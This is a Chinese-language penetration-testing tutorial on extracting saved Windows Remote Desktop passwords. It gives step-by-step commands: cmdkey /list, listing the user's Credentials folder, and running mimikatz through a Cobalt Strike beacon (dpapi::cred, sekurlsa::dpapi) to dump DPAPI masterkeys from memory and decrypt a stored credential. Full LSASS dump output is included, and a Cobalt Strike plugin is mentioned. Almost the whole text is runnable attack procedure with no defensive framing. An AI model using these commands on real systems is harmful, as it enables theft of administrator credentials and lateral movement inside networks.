内网渗透之获取windows远程桌面（RDP）连接记录密码

利用条件：就是 mstsc 连接的时候，管理员勾选了自动保存密码连接的选项。

# 可疑通过cmdkey /list查看是否保存了凭据
>cmdkey /list

1、查找本地的 Credentials

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

2、mimikatz

beacon> mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85

得到 guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6}

3、使用 sekurlsa::dpapi

beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 788081 bytes
[+] received output:

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-BVVD8VFVMPR$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-20


Authentication Id : 0 ; 283117 (00000000:000451ed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-BVVD8VFVMPR
Logon Server      : WIN-BVVD8VFVMPR
Logon Time        : 2022/6/20 12:24:48
SID               : S-1-5-21-2815261350-2957312007-627930173-500
	 [00000000]
	 * GUID      :	{877c4ae6-d114-4851-b9ab-c8d23c7f09a6}
	 * Time      :	2022/6/25 13:14:36
	 * MasterKey :	7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0
	 * sha1(key) :	d90d81651dc81f37b34698ac101cf04c094c0cde


Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-19


Authentication Id : 0 ; 46503 (00000000:0000b5a7)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : 


Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-BVVD8VFVMPR$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-18
	 [00000000]
	 * GUID      :	{62dbbb7e-3978-4e4a-bdd4-65a7fa11a0ce}
	 * Time      :	2022/6/25 12:58:55
	 * MasterKey :	54ef76dfc016a1471d59ce8d179ba455a201ca749ace616058b6ef0b8573e558cedb185d57d0bc1be40238da47d16a1124f3a69bbaccaf5f5b2e61bd637e9b73
	 * sha1(key) :	6aff948e5a90e41f2edffd26da163af4f146b1a5
	 [00000001]
	 * GUID      :	{43ea2159-28dc-4507-90bd-751f19e7db5d}
	 * Time      :	2022/6/20 12:24:39
	 * MasterKey :	cc412391998e555e76bfa10964c792fd675b037dec9c5be3b9456db4f5eb64022c0698d6960de4c0a8aca21586f5b445bf490c4a392014721636be5c5f75a3f8
	 * sha1(key) :	56b3c08a69e9c1a346e35fa4cb572b70cf5a158e
	 [00000002]
	 * GUID      :	{0fefdf3f-162a-4a3f-a6df-6ec2dee82eb5}
	 * Time      :	2022/6/25 12:58:55
	 * MasterKey :	89012fd9de4903051a9b99225216df633efd8d1e014624f0a68670432da8fc1fda98babc447d5de1d3fe10069a6358be9a64fb1f634cf6012307465455757369
	 * sha1(key) :	3604ef0e99dab0ea49db307fd8950b8fd0d4d310
	 [00000003]
	 * GUID      :	{3d58f13e-ba7c-4457-835c-5a7f1353590c}
	 * Time      :	2022/6/25 13:12:50
	 * MasterKey :	c12ff664090f806ae980d32bfe19af5ba76f3d5f1dcad46e70da7affaede04c02ba00d5d75380fd4bd77f6cd535be3eec103f2f5048ceee96d61347e3d24d7ba
	 * sha1(key) :	be0643a97d988adcc8e5ae2b3d6df9702df32dc0

根据 guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6} 找到 masterkey

MasterKey：

7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0

4、解密

mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85 /masterkey:7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0

cs 的 taowu 插件也有模块可以达到同样的效果，获取 windows 远程桌面的连接记录的密码